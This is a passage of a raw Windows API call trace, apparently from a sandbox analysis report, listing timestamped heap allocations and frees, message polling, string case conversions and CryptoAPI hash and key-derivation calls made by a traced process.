Size=0x10) returned 0x24a9ca8 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.889] CryptHashData (hHash=0xaa5920, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0262.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.890] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.891] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.891] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.891] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.891] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.892] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.892] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.892] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.893] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.896] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.898] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.898] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.899] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.899] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.899] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.899] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.899] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 